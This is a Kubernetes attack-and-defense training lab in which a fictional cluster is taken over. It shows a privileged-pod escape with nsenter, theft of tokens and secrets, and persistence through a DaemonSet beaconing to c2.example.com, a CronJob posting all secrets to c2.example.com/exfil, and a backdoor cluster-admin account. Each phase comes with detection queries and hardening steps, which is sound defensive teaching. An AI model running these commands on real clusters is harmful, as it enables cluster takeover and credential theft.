Lab 27: Kubernetes Attack & Defense — Pod Escape to Cluster Takeover¶
Chapter: 46 — Cloud & Container Red Teaming Difficulty: ⭐⭐⭐⭐ Advanced Estimated Time: 3–4 hours Prerequisites: Chapter 46, Chapter 20, familiarity with Kubernetes concepts, basic kubectl usage, container fundamentals
Overview¶
In this lab you will:
- Perform reconnaissance against a Kubernetes cluster to enumerate namespaces, pods, services, and RBAC misconfigurations using kubectl, curl, and the Kubernetes API
- Exploit a privileged pod to escape the container namespace via nsenter, gaining full host-level access on the underlying worker node
- Conduct lateral movement by abusing overly permissive ClusterRoleBindings to access secrets across namespaces and impersonate service accounts
- Establish persistence through malicious DaemonSets and CronJobs that survive pod restarts and node rescheduling
- Deploy defensive controls including Pod Security Standards, Falco runtime rules, network policies, and build comprehensive KQL and SPL detection queries for every attack technique
Synthetic Data Only
All data in this lab is 100% synthetic and fictional. All IP addresses use RFC 1918 (10.0.0.0/8) reserved ranges. All domains use *.example or *.example.com. All service account tokens, secrets, and credentials are completely fictitious — no real credentials are referenced. All tokens shown are example values or REDACTED. This lab is for defensive education only — never use these techniques against systems you do not own or without explicit written authorization.
Scenario¶
Engagement Brief — Apex Cloud Services
Organization: Apex Cloud Services (fictional) Domain: acme.example (SYNTHETIC) Cluster Name: prod-east-01 (SYNTHETIC) API Server: https://k8s-api.acme.example:6443 — 10.50.0.10 (SYNTHETIC) Worker Node 1: node01.acme.example — 10.50.1.11 (SYNTHETIC) Worker Node 2: node02.acme.example — 10.50.1.12 (SYNTHETIC) Worker Node 3: node03.acme.example — 10.50.1.13 (SYNTHETIC) Pod Network CIDR: 10.50.128.0/17 (SYNTHETIC) Service CIDR: 10.50.64.0/18 (SYNTHETIC) Container Registry: registry.acme.example:5000 (SYNTHETIC) Engagement Type: Kubernetes red team assessment — full kill chain from pod compromise to cluster takeover Scope: All namespaces, RBAC objects, pod security configurations, secrets, network policies Out of Scope: Cloud provider control plane (IAM, VPC), physical infrastructure Test Window: 2026-04-07 08:00 – 2026-04-11 20:00 UTC Emergency Contact: soc@apex.example.com (SYNTHETIC)
Summary: Apex Cloud Services runs a multi-tenant Kubernetes cluster hosting microservices for their SaaS platform across 12 namespaces. A recent audit flagged several pods running with privileged security contexts and overly broad RBAC roles. The CISO has authorized a red team assessment to demonstrate the real-world impact of these misconfigurations — from initial pod compromise through full cluster takeover — then provide detection engineering and hardening recommendations.
Certification Relevance¶
Certification Mapping
This lab maps to objectives in the following certifications:
| Certification | Relevant Domains |
|---|---|
| CKS (Certified Kubernetes Security Specialist) | Cluster Hardening, System Hardening, Supply Chain Security, Runtime Security |
| CKA (Certified Kubernetes Administrator) | Cluster Architecture, Workloads, Security, Troubleshooting |
| CompTIA Security+ (SY0-701) | Domain 3: Security Architecture (18%), Domain 4: Security Operations (28%) |
| CompTIA CySA+ (CS0-003) | Domain 1: Security Operations (33%), Domain 4: Incident Response (22%) |
| SC-200 (Microsoft Security Operations Analyst) | KQL Detection, Defender for Containers, Sentinel Analytics |
| OSCP (Offensive Security Certified Professional) | Active Information Gathering, Post-Exploitation, Privilege Escalation |
Prerequisites¶
Required Tools¶
| Tool | Purpose | Version |
|---|---|---|
| kubectl | Kubernetes CLI for cluster interaction | 1.28+ |
| curl | HTTP requests to Kubernetes API | Latest |
| jq | JSON parsing for API responses | 1.7+ |
| nsenter | Linux namespace manipulation for container escape | Latest (util-linux) |
| crictl | Container runtime inspection | 1.28+ |
| Falco | Runtime threat detection for containers | 0.37+ |
| Trivy | Container image vulnerability scanning | 0.50+ |
| kube-hunter | Kubernetes penetration testing tool | Latest |
| kubeletctl | Kubelet API interaction | Latest |
Test Accounts (Synthetic)¶
| Role | Service Account | Token | Notes |
|---|---|---|---|
| Compromised App Pod | webapp-sa (ns: frontend) | REDACTED | Mounted in vulnerable web pod |
| Monitoring Agent | monitor-sa (ns: monitoring) | REDACTED | Has broad read access (misconfigured) |
| CI/CD Pipeline | cicd-deployer (ns: cicd) | REDACTED | Can create workloads in multiple namespaces |
| Cluster Admin | cluster-admin-sa (ns: kube-system) | REDACTED | Full cluster-admin privileges |
| Backup Operator | backup-sa (ns: backup) | REDACTED | Secrets read across namespaces |
Lab Environment Setup¶
# Lab Environment — Use minikube, kind, or a dedicated test cluster (SYNTHETIC)
# This lab requires a Kubernetes cluster with intentional misconfigurations.
# Recommended: kind (Kubernetes in Docker) for safe isolated testing.
# Create a 3-node cluster with kind (SYNTHETIC)
$ cat <<EOF > kind-config.yaml
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
- role: worker
- role: worker
- role: worker
networking:
podSubnet: "10.50.128.0/17"
serviceSubnet: "10.50.64.0/18"
EOF
$ kind create cluster --name prod-east-01 --config kind-config.yaml
Creating cluster "prod-east-01" ...
✓ Ensuring node image (kindest/node:v1.28.0)
✓ Preparing nodes
✓ Writing configuration
✓ Starting control-plane
✓ Installing CNI
✓ Installing StorageClass
✓ Joining worker nodes
Set kubectl context to "kind-prod-east-01"
# Verify cluster connectivity (SYNTHETIC)
$ kubectl cluster-info
Kubernetes control plane is running at https://10.50.0.10:6443
CoreDNS is running at https://10.50.0.10:6443/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy
$ kubectl get nodes
NAME STATUS ROLES AGE VERSION
prod-east-01-control-plane Ready control-plane 2m v1.28.0
prod-east-01-worker Ready <none> 90s v1.28.0
prod-east-01-worker2 Ready <none> 90s v1.28.0
prod-east-01-worker3 Ready <none> 90s v1.28.0
# Deploy the intentionally misconfigured lab environment (SYNTHETIC)
# This creates namespaces, RBAC roles, and vulnerable workloads
$ kubectl create namespace frontend
$ kubectl create namespace backend
$ kubectl create namespace monitoring
$ kubectl create namespace cicd
$ kubectl create namespace backup
$ kubectl create namespace database
# Deploy a privileged pod (the vulnerable entry point) (SYNTHETIC)
$ cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: webapp-vuln
namespace: frontend
labels:
app: webapp
spec:
serviceAccountName: webapp-sa
containers:
- name: webapp
image: registry.acme.example:5000/webapp:1.4.2
securityContext:
privileged: true
volumeMounts:
- name: host-root
mountPath: /host
volumes:
- name: host-root
hostPath:
path: /
type: Directory
EOF
pod/webapp-vuln created
# Create overly permissive ClusterRoleBinding (SYNTHETIC)
$ cat <<EOF | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: monitor-cluster-wide
subjects:
- kind: ServiceAccount
name: monitor-sa
namespace: monitoring
roleRef:
kind: ClusterRole
name: cluster-admin
apiGroup: rbac.authorization.k8s.io
EOF
clusterrolebinding.rbac.authorization.k8s.io/monitor-cluster-wide created
Phase 1: Reconnaissance — Enumerate the Cluster¶
Objective¶
From a compromised pod, enumerate the cluster to identify attack surface, misconfigured RBAC, and high-value targets.
Step 1.1: Discover Kubernetes API from Within a Pod¶
# From inside the compromised webapp-vuln pod (SYNTHETIC)
# Kubernetes automatically mounts a service account token
$ ls -la /var/run/secrets/kubernetes.io/serviceaccount/
total 4
drwxrwxrwt 3 root root 140 Apr 7 08:15 .
drwxr-xr-x 3 root root 40 Apr 7 08:15 ..
lrwxrwxrwx 1 root root 13 Apr 7 08:15 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root 16 Apr 7 08:15 namespace -> ..data/namespace
lrwxrwxrwx 1 root root 12 Apr 7 08:15 token -> ..data/token
# Read the service account token (SYNTHETIC)
$ TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
$ CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
$ APISERVER=https://kubernetes.default.svc
# Test API access — get current pod's permissions (SYNTHETIC)
$ curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces/frontend/pods | jq '.items[].metadata.name'
"webapp-vuln"
"webapp-frontend-7d8f9c6b4a-x2k9m"
"webapp-frontend-7d8f9c6b4a-p4n7j"
Step 1.2: Enumerate Namespaces and RBAC¶
# Check what permissions this service account has (SYNTHETIC)
$ curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/apis/authorization.k8s.io/v1/selfsubjectaccessreviews \
-X POST -H "Content-Type: application/json" \
-d '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectAccessReview","spec":{"resourceAttributes":{"namespace":"frontend","verb":"list","resource":"secrets"}}}' \
| jq '.status'
{
"allowed": true,
"reason": ""
}
# Enumerate all namespaces (SYNTHETIC)
$ curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces | jq '.items[].metadata.name'
"default"
"frontend"
"backend"
"monitoring"
"cicd"
"backup"
"database"
"kube-system"
"kube-public"
"kube-node-lease"
# List all pods across all namespaces (SYNTHETIC)
$ kubectl --token=$TOKEN get pods --all-namespaces
NAMESPACE NAME READY STATUS RESTARTS AGE
frontend webapp-vuln 1/1 Running 0 15m
frontend webapp-frontend-7d8f9c6b4a-x2k9m 1/1 Running 0 15m
frontend webapp-frontend-7d8f9c6b4a-p4n7j 1/1 Running 0 15m
backend api-server-5c9d8e7f6b-m3k2n 1/1 Running 0 15m
backend api-server-5c9d8e7f6b-j8h4p 1/1 Running 0 15m
database postgres-primary-0 1/1 Running 0 15m
database redis-cache-6f7a8b9c0d-q5w2e 1/1 Running 0 15m
monitoring prometheus-server-0 1/1 Running 0 15m
monitoring grafana-4d5e6f7a8b-r9t1y 1/1 Running 0 15m
cicd jenkins-controller-0 1/1 Running 0 15m
backup velero-7a8b9c0d1e-u3i5o 1/1 Running 0 15m
kube-system coredns-5d78c9869d-abc12 1/1 Running 0 20m
kube-system etcd-prod-east-01-control-plane 1/1 Running 0 20m
kube-system kube-apiserver-prod-east-01-control-plane 1/1 Running 0 20m
Step 1.3: Identify Misconfigured Pods¶
# Find privileged pods — high-value targets for escape (SYNTHETIC)
$ kubectl get pods --all-namespaces -o json | \
jq -r '.items[] | select(.spec.containers[].securityContext.privileged==true) |
"\(.metadata.namespace)/\(.metadata.name)"'
frontend/webapp-vuln
monitoring/prometheus-server-0
# Check for pods with hostPID or hostNetwork (SYNTHETIC)
$ kubectl get pods --all-namespaces -o json | \
jq -r '.items[] | select(.spec.hostPID==true or .spec.hostNetwork==true) |
"\(.metadata.namespace)/\(.metadata.name) hostPID=\(.spec.hostPID) hostNetwork=\(.spec.hostNetwork)"'
monitoring/prometheus-server-0 hostPID=true hostNetwork=false
# List service accounts with secrets mounted (SYNTHETIC)
$ kubectl get pods --all-namespaces -o json | \
jq -r '.items[] | "\(.metadata.namespace)/\(.metadata.name) sa=\(.spec.serviceAccountName)"'
frontend/webapp-vuln sa=webapp-sa
frontend/webapp-frontend-7d8f9c6b4a-x2k9m sa=default
backend/api-server-5c9d8e7f6b-m3k2n sa=api-sa
monitoring/prometheus-server-0 sa=monitor-sa
cicd/jenkins-controller-0 sa=cicd-deployer
backup/velero-7a8b9c0d1e-u3i5o sa=backup-sa
Expected Findings:
webapp-vulnpod runs as privileged with the host filesystem mounted at/hostmonitor-sahascluster-adminbound via ClusterRoleBinding (massively over-permissioned)cicd-deployercan create workloads across multiple namespaces- No network policies are enforced — all pods can communicate freely
Detection — Phase 1 (Reconnaissance)¶
KQL — Detect Kubernetes API Enumeration
// Detect excessive API calls from a single pod / service account (SYNTHETIC)
AzureDiagnostics
| where Category == "kube-audit"
| where log_s has "list" or log_s has "get"
| extend verb = tostring(parse_json(log_s).verb)
| extend user = tostring(parse_json(log_s).user.username)
| extend sourceIP = tostring(parse_json(log_s).sourceIPs[0])
| extend resource = tostring(parse_json(log_s).objectRef.resource)
| where verb in ("list", "get")
| summarize RequestCount = count(), ResourcesAccessed = dcount(resource),
Resources = make_set(resource) by user, sourceIP, bin(TimeGenerated, 5m)
| where RequestCount > 50 or ResourcesAccessed > 10
| project TimeGenerated, user, sourceIP, RequestCount, ResourcesAccessed, Resources
SPL — Detect Kubernetes API Enumeration
index=kubernetes sourcetype="kube:apiserver-audit"
| spath input=log "verb" output=verb
| spath input=log "user.username" output=user
| spath input=log "sourceIPs{}" output=sourceIP
| spath input=log "objectRef.resource" output=resource
| search verb IN ("list", "get")
| bin _time span=5m
| stats count AS RequestCount dc(resource) AS ResourcesAccessed
values(resource) AS Resources by user sourceIP _time
| where RequestCount > 50 OR ResourcesAccessed > 10
Remediation — Phase 1¶
- Disable automountServiceAccountToken on pods that do not require API access
- Apply least-privilege RBAC — remove broad
listandgetpermissions on cluster-scoped resources - Enable Kubernetes audit logging at the
RequestResponselevel for sensitive resources - Deploy admission controllers (OPA Gatekeeper or Kyverno) to enforce RBAC review on new bindings
Phase 2: Privilege Escalation — Pod Escape via Privileged Container¶
Objective¶
Exploit the privileged pod and hostPath mount to escape the container namespace and gain root access on the underlying worker node.
Step 2.1: Verify Privileged Status¶
# Confirm we are running as privileged (SYNTHETIC)
$ cat /proc/1/status | grep -i cap
CapInh: 0000003fffffffff
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
# All capabilities are set — this container is fully privileged
# Verify host filesystem is mounted (SYNTHETIC)
$ ls /host/etc/hostname
/host/etc/hostname
$ cat /host/etc/hostname
node02.acme.example
Step 2.2: Escape to Host via nsenter¶
# Use nsenter to break into the host's PID namespace (SYNTHETIC)
# PID 1 on the host is the init process
$ nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
# We are now running as root on the worker node (SYNTHETIC)
root@node02:~# whoami
root
root@node02:~# hostname
node02.acme.example
root@node02:~# ip addr show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP
link/ether 02:42:0a:32:01:0c brd ff:ff:ff:ff:ff:ff
inet 10.50.1.12/24 brd 10.50.1.255 scope global eth0
valid_lft forever preferred_lft forever
Step 2.3: Harvest Kubelet Credentials¶
# Read the kubelet configuration on the host (SYNTHETIC)
root@node02:~# cat /var/lib/kubelet/config.yaml | grep -A5 authentication
authentication:
anonymous:
enabled: false
webhook:
cacheTTL: 2m0s
enabled: true
# Extract the kubelet client certificate (SYNTHETIC)
root@node02:~# ls /var/lib/kubelet/pki/
kubelet-client-current.pem kubelet.crt kubelet.key
# Use the kubelet cert to authenticate to the API server (SYNTHETIC)
root@node02:~# curl -s --cert /var/lib/kubelet/pki/kubelet-client-current.pem \
--key /var/lib/kubelet/pki/kubelet.key \
--cacert /etc/kubernetes/pki/ca.crt \
https://10.50.0.10:6443/api/v1/nodes | jq '.items[].metadata.name'
"prod-east-01-control-plane"
"prod-east-01-worker"
"prod-east-01-worker2"
"prod-east-01-worker3"
Expected Findings:
- Full root access on worker node
node02.acme.example(10.50.1.12) - Kubelet client certificate provides node-level API access
- All containers on this node can be inspected and manipulated
Detection — Phase 2 (Privilege Escalation)¶
KQL — Detect nsenter Container Escape
// Detect nsenter execution indicating container escape attempt (SYNTHETIC)
Syslog
| where ProcessName == "falco" or Facility == "authpriv"
| where SyslogMessage has "nsenter" or SyslogMessage has "setns"
| extend ContainerID = extract("container_id=([a-f0-9]+)", 1, SyslogMessage)
| extend TargetPID = extract("target=(\\d+)", 1, SyslogMessage)
| project TimeGenerated, Computer, SyslogMessage, ContainerID, TargetPID
| sort by TimeGenerated desc
// Alternative — Defender for Containers process event (SYNTHETIC)
DeviceProcessEvents
| where FileName == "nsenter"
| where ProcessCommandLine has "--target 1" or ProcessCommandLine has "--mount"
| extend IsContainerEscape = iff(ProcessCommandLine has "--pid" and
ProcessCommandLine has "--mount", true, false)
| where IsContainerEscape == true
| project Timestamp, DeviceName, AccountName, ProcessCommandLine,
InitiatingProcessFileName
SPL — Detect nsenter Container Escape
Falco Rule — Container Escape via nsenter
- rule: Container Escape via nsenter
desc: Detect nsenter used to break out of container namespace
condition: >
spawned_process and container and proc.name = "nsenter"
and proc.args contains "--target" and proc.args contains "--pid"
output: >
nsenter container escape detected (user=%user.name container=%container.id
command=%proc.cmdline pod=%k8s.pod.name ns=%k8s.ns.name image=%container.image.repository)
priority: CRITICAL
tags: [container, escape, mitre_privilege_escalation, T1611]
Remediation — Phase 2¶
- Never run pods as privileged — remove
privileged: truefrom all security contexts - Block hostPath mounts — use Pod Security Standards (
restrictedprofile) or OPA policies - Drop all capabilities and add back only what is needed:
drop: ["ALL"],add: ["NET_BIND_SERVICE"] - Enable Falco with the
Container Escape via nsenterrule above - Use read-only root filesystem where possible:
readOnlyRootFilesystem: true
Phase 3: Lateral Movement — RBAC Abuse and Secrets Exfiltration¶
Objective¶
Leverage overly permissive RBAC bindings to move laterally across namespaces, access secrets, and escalate to cluster-admin.
Step 3.1: Discover Overly Permissive ClusterRoleBindings¶
# From the escaped node, use the kubelet cert to query RBAC (SYNTHETIC)
root@node02:~# KUBECONFIG=/etc/kubernetes/kubelet.conf kubectl get clusterrolebindings \
-o json | jq -r '.items[] | select(.roleRef.name=="cluster-admin") |
"\(.metadata.name): \(.subjects[].kind)/\(.subjects[].name) in \(.subjects[].namespace)"'
cluster-admin: User/kubernetes-admin in <nil>
monitor-cluster-wide: ServiceAccount/monitor-sa in monitoring
system:masters: Group/system:masters in <nil>
# The monitor-sa service account has cluster-admin — jackpot (SYNTHETIC)
Step 3.2: Steal the monitor-sa Token¶
# List secrets in the monitoring namespace (SYNTHETIC)
root@node02:~# KUBECONFIG=/etc/kubernetes/kubelet.conf kubectl get secrets \
-n monitoring
NAME TYPE DATA AGE
monitor-sa-token-x7k2m kubernetes.io/service-account-token 3 45m
prometheus-config Opaque 2 45m
grafana-admin-creds Opaque 2 45m
alertmanager-webhook Opaque 1 45m
# Extract the monitor-sa token (SYNTHETIC)
root@node02:~# KUBECONFIG=/etc/kubernetes/kubelet.conf kubectl get secret \
monitor-sa-token-x7k2m -n monitoring -o jsonpath='{.data.token}' | base64 -d
eyJhbGciOiJSUzI1NiIsImtpZCI6IlJFREFDVEVEIn0.REDACTED_TOKEN_PAYLOAD.REDACTED_SIGNATURE
$ export ADMIN_TOKEN="eyJhbGciOiJSUzI1NiIsImtpZCI6IlJFREFDVEVEIn0.REDACTED_TOKEN_PAYLOAD.REDACTED_SIGNATURE"
Step 3.3: Exfiltrate Secrets Across Namespaces¶
# With cluster-admin, read secrets from all namespaces (SYNTHETIC)
$ kubectl --token=$ADMIN_TOKEN get secrets --all-namespaces \
--field-selector type=Opaque -o json | \
jq -r '.items[] | "\(.metadata.namespace)/\(.metadata.name)"'
backend/api-db-credentials
backend/jwt-signing-key
database/postgres-admin-password
database/redis-auth-token
cicd/docker-registry-creds
cicd/github-deploy-key
backup/cloud-storage-key
frontend/tls-cert-prod
monitoring/grafana-admin-creds
# Decode a secret (SYNTHETIC)
$ kubectl --token=$ADMIN_TOKEN get secret api-db-credentials \
-n backend -o jsonpath='{.data.password}' | base64 -d
REDACTED_DB_PASSWORD_SYNTHETIC
$ kubectl --token=$ADMIN_TOKEN get secret postgres-admin-password \
-n database -o jsonpath='{.data.POSTGRES_PASSWORD}' | base64 -d
REDACTED_POSTGRES_PASSWORD_SYNTHETIC
Expected Findings:
monitor-sahas fullcluster-adminaccess — allows reading all secrets cluster-wide- Database credentials, JWT signing keys, registry credentials, and cloud storage keys are all accessible
- No secret encryption at rest is configured (etcd stores secrets in plaintext)
Detection — Phase 3 (Lateral Movement)¶
KQL — Detect Secrets Access Across Multiple Namespaces
// Detect a single identity reading secrets from multiple namespaces (SYNTHETIC)
AzureDiagnostics
| where Category == "kube-audit"
| extend verb = tostring(parse_json(log_s).verb)
| extend user = tostring(parse_json(log_s).user.username)
| extend resource = tostring(parse_json(log_s).objectRef.resource)
| extend namespace = tostring(parse_json(log_s).objectRef.namespace)
| where resource == "secrets" and verb in ("get", "list")
| summarize NamespaceCount = dcount(namespace),
Namespaces = make_set(namespace),
SecretAccessCount = count() by user, bin(TimeGenerated, 15m)
| where NamespaceCount > 2
| project TimeGenerated, user, NamespaceCount, SecretAccessCount, Namespaces
SPL — Detect Secrets Access Across Multiple Namespaces
index=kubernetes sourcetype="kube:apiserver-audit"
| spath input=log "verb" output=verb
| spath input=log "user.username" output=user
| spath input=log "objectRef.resource" output=resource
| spath input=log "objectRef.namespace" output=namespace
| search resource="secrets" verb IN ("get", "list")
| bin _time span=15m
| stats dc(namespace) AS NamespaceCount count AS SecretAccessCount
values(namespace) AS Namespaces by user _time
| where NamespaceCount > 2
KQL — Detect ClusterRoleBinding to cluster-admin
// Alert when any new ClusterRoleBinding grants cluster-admin (SYNTHETIC)
AzureDiagnostics
| where Category == "kube-audit"
| extend verb = tostring(parse_json(log_s).verb)
| extend resource = tostring(parse_json(log_s).objectRef.resource)
| extend requestObj = parse_json(log_s).requestObject
| where resource == "clusterrolebindings" and verb in ("create", "update", "patch")
| extend roleName = tostring(requestObj.roleRef.name)
| where roleName == "cluster-admin"
| extend subjectKind = tostring(requestObj.subjects[0].kind)
| extend subjectName = tostring(requestObj.subjects[0].name)
| extend actor = tostring(parse_json(log_s).user.username)
| project TimeGenerated, actor, verb, subjectKind, subjectName, roleName
SPL — Detect ClusterRoleBinding to cluster-admin
index=kubernetes sourcetype="kube:apiserver-audit"
| spath input=log "verb" output=verb
| spath input=log "objectRef.resource" output=resource
| spath input=log "requestObject.roleRef.name" output=roleName
| spath input=log "requestObject.subjects{}.name" output=subjectName
| spath input=log "user.username" output=actor
| search resource="clusterrolebindings" verb IN ("create", "update", "patch")
roleName="cluster-admin"
| table _time actor verb subjectName roleName
Remediation — Phase 3¶
- Audit all ClusterRoleBindings — remove any binding that grants
cluster-adminto non-essential service accounts - Use namespace-scoped Roles instead of ClusterRoles where possible
- Enable etcd encryption at rest for secrets using
EncryptionConfiguration - Rotate all secrets immediately after detecting unauthorized access
- Use external secret managers (HashiCorp Vault, AWS Secrets Manager) instead of native K8s secrets
Phase 4: Persistence — DaemonSet and CronJob Backdoors¶
Objective¶
Establish persistent access to the cluster that survives pod restarts, node rescheduling, and routine maintenance.
Step 4.1: Deploy a Malicious DaemonSet¶
# Deploy a DaemonSet that runs on every node (SYNTHETIC)
$ cat <<EOF | kubectl --token=$ADMIN_TOKEN apply -f -
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: node-monitor-agent
namespace: kube-system
labels:
app: node-monitor
k8s-app: node-monitor
spec:
selector:
matchLabels:
app: node-monitor
template:
metadata:
labels:
app: node-monitor
spec:
hostPID: true
hostNetwork: true
containers:
- name: monitor
image: registry.acme.example:5000/node-monitor:1.0
securityContext:
privileged: true
command: ["/bin/sh", "-c"]
args:
- |
while true; do
curl -s http://c2.example.com:8443/beacon \
-d "node=$(hostname)&ip=$(hostname -I)" 2>/dev/null
sleep 300
done
volumeMounts:
- name: host-root
mountPath: /host
volumes:
- name: host-root
hostPath:
path: /
tolerations:
- operator: Exists
EOF
daemonset.apps/node-monitor-agent created
# Verify it deployed to all nodes (SYNTHETIC)
$ kubectl --token=$ADMIN_TOKEN get pods -n kube-system -l app=node-monitor -o wide
NAME READY STATUS RESTARTS AGE IP NODE
node-monitor-agent-a1b2c 1/1 Running 0 30s 10.50.1.11 prod-east-01-worker
node-monitor-agent-d3e4f 1/1 Running 0 30s 10.50.1.12 prod-east-01-worker2
node-monitor-agent-g5h6i 1/1 Running 0 30s 10.50.1.13 prod-east-01-worker3
node-monitor-agent-j7k8l 1/1 Running 0 30s 10.50.0.10 prod-east-01-control-plane
Step 4.2: Deploy a CronJob Backdoor¶
# Create a CronJob that exfiltrates secrets every 6 hours (SYNTHETIC)
$ cat <<EOF | kubectl --token=$ADMIN_TOKEN apply -f -
apiVersion: batch/v1
kind: CronJob
metadata:
name: log-rotation-job
namespace: kube-system
labels:
app: log-rotation
spec:
schedule: "0 */6 * * *"
jobTemplate:
spec:
template:
spec:
serviceAccountName: cluster-admin-sa
containers:
- name: log-rotate
image: registry.acme.example:5000/log-rotate:2.1
command: ["/bin/sh", "-c"]
args:
- |
kubectl get secrets --all-namespaces -o json | \
curl -s -X POST http://c2.example.com:8443/exfil \
-H "Content-Type: application/json" -d @- 2>/dev/null
restartPolicy: OnFailure
EOF
cronjob.batch/log-rotation-job created
Step 4.3: Create a Backdoor Service Account¶
# Create a new service account with cluster-admin for re-entry (SYNTHETIC)
$ kubectl --token=$ADMIN_TOKEN create serviceaccount backdoor-sa -n kube-system
serviceaccount/backdoor-sa created
$ cat <<EOF | kubectl --token=$ADMIN_TOKEN apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: emergency-access-binding
subjects:
- kind: ServiceAccount
name: backdoor-sa
namespace: kube-system
roleRef:
kind: ClusterRole
name: cluster-admin
apiGroup: rbac.authorization.k8s.io
EOF
clusterrolebinding.rbac.authorization.k8s.io/emergency-access-binding created
# Generate a long-lived token for the backdoor account (SYNTHETIC)
$ kubectl --token=$ADMIN_TOKEN create token backdoor-sa \
-n kube-system --duration=8760h
eyJhbGciOiJSUzI1NiIsImtpZCI6IlJFREFDVEVEIn0.REDACTED_BACKDOOR_TOKEN.REDACTED_SIGNATURE
Expected Findings:
- DaemonSet runs on every node including control plane (via
tolerations: Exists) - CronJob exfiltrates secrets every 6 hours using cluster-admin privileges
- Backdoor service account persists even if the DaemonSet is discovered and removed
- All persistence mechanisms disguised with legitimate-sounding names
Detection — Phase 4 (Persistence)¶
KQL — Detect DaemonSet Creation in kube-system
// Alert on new DaemonSet or CronJob creation in kube-system (SYNTHETIC)
AzureDiagnostics
| where Category == "kube-audit"
| extend verb = tostring(parse_json(log_s).verb)
| extend resource = tostring(parse_json(log_s).objectRef.resource)
| extend namespace = tostring(parse_json(log_s).objectRef.namespace)
| extend name = tostring(parse_json(log_s).objectRef.name)
| extend user = tostring(parse_json(log_s).user.username)
| where namespace == "kube-system"
| where resource in ("daemonsets", "cronjobs", "jobs")
| where verb in ("create", "update", "patch")
| project TimeGenerated, user, verb, resource, name, namespace
SPL — Detect DaemonSet Creation in kube-system
index=kubernetes sourcetype="kube:apiserver-audit"
| spath input=log "verb" output=verb
| spath input=log "objectRef.resource" output=resource
| spath input=log "objectRef.namespace" output=namespace
| spath input=log "objectRef.name" output=name
| spath input=log "user.username" output=user
| search namespace="kube-system" resource IN ("daemonsets", "cronjobs", "jobs")
verb IN ("create", "update", "patch")
| table _time user verb resource name namespace
KQL — Detect New ServiceAccount with cluster-admin
// Correlate: new service account creation followed by cluster-admin binding (SYNTHETIC)
let sa_created = AzureDiagnostics
| where Category == "kube-audit"
| extend verb = tostring(parse_json(log_s).verb)
| extend resource = tostring(parse_json(log_s).objectRef.resource)
| where resource == "serviceaccounts" and verb == "create"
| extend saName = tostring(parse_json(log_s).objectRef.name)
| extend actor = tostring(parse_json(log_s).user.username)
| project SACreatedTime = TimeGenerated, actor, saName;
let crb_created = AzureDiagnostics
| where Category == "kube-audit"
| extend verb = tostring(parse_json(log_s).verb)
| extend resource = tostring(parse_json(log_s).objectRef.resource)
| where resource == "clusterrolebindings" and verb == "create"
| extend roleName = tostring(parse_json(tostring(parse_json(log_s).requestObject)).roleRef.name)
| extend boundSA = tostring(parse_json(tostring(parse_json(log_s).requestObject)).subjects[0].name)
| where roleName == "cluster-admin"
| project CRBCreatedTime = TimeGenerated, boundSA, roleName;
sa_created
| join kind=inner (crb_created) on $left.saName == $right.boundSA
| where CRBCreatedTime - SACreatedTime between (0s .. 10m)
| project SACreatedTime, CRBCreatedTime, actor, saName, roleName
SPL — Detect New ServiceAccount with cluster-admin
index=kubernetes sourcetype="kube:apiserver-audit"
| spath input=log "verb" output=verb
| spath input=log "objectRef.resource" output=resource
| spath input=log "objectRef.name" output=name
| spath input=log "user.username" output=actor
| spath input=log "requestObject.roleRef.name" output=roleName
| spath input=log "requestObject.subjects{}.name" output=boundSA
| search (resource="serviceaccounts" verb="create")
OR (resource="clusterrolebindings" verb="create" roleName="cluster-admin")
| transaction boundSA maxspan=10m
| where eventcount > 1
| table _time actor name resource verb roleName boundSA
Remediation — Phase 4¶
- Restrict workload creation in kube-system — only cluster operators should deploy to system namespaces
- Monitor for new ClusterRoleBindings — alert on any binding that references
cluster-admin - Set short token expiration — use
--durationlimits and rotate service account tokens regularly - Audit DaemonSets and CronJobs periodically — compare against a known-good baseline
- Use image allowlisting — only permit images from trusted registries via admission policies
Phase 5: Defense — Hardening the Cluster¶
Objective¶
Deploy defensive controls that prevent or detect each attack phase demonstrated above.
Step 5.1: Enforce Pod Security Standards¶
# Apply Pod Security Standards at the namespace level (SYNTHETIC)
# Enforce "restricted" profile — blocks privileged pods, hostPath, hostPID
apiVersion: v1
kind: Namespace
metadata:
name: frontend
labels:
pod-security.kubernetes.io/enforce: restricted
pod-security.kubernetes.io/enforce-version: latest
pod-security.kubernetes.io/audit: restricted
pod-security.kubernetes.io/warn: restricted
# Apply to all application namespaces (SYNTHETIC)
$ for ns in frontend backend database monitoring cicd backup; do
kubectl label namespace $ns \
pod-security.kubernetes.io/enforce=restricted \
pod-security.kubernetes.io/audit=restricted \
pod-security.kubernetes.io/warn=restricted \
--overwrite
done
namespace/frontend labeled
namespace/backend labeled
namespace/database labeled
namespace/monitoring labeled
namespace/cicd labeled
namespace/backup labeled
# Test: try to create a privileged pod (should be rejected) (SYNTHETIC)
$ kubectl apply -f webapp-vuln.yaml -n frontend
Error from server (Forbidden): error when creating "webapp-vuln.yaml":
pods "webapp-vuln" is forbidden: violates PodSecurity "restricted:latest":
privileged (container "webapp" must not set securityContext.privileged=true),
hostPath volumes (volume "host-root" must not use hostPath)
Step 5.2: Deploy Network Policies¶
# Default deny all ingress and egress in each namespace (SYNTHETIC)
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: default-deny-all
namespace: frontend
spec:
podSelector: {}
policyTypes:
- Ingress
- Egress
---
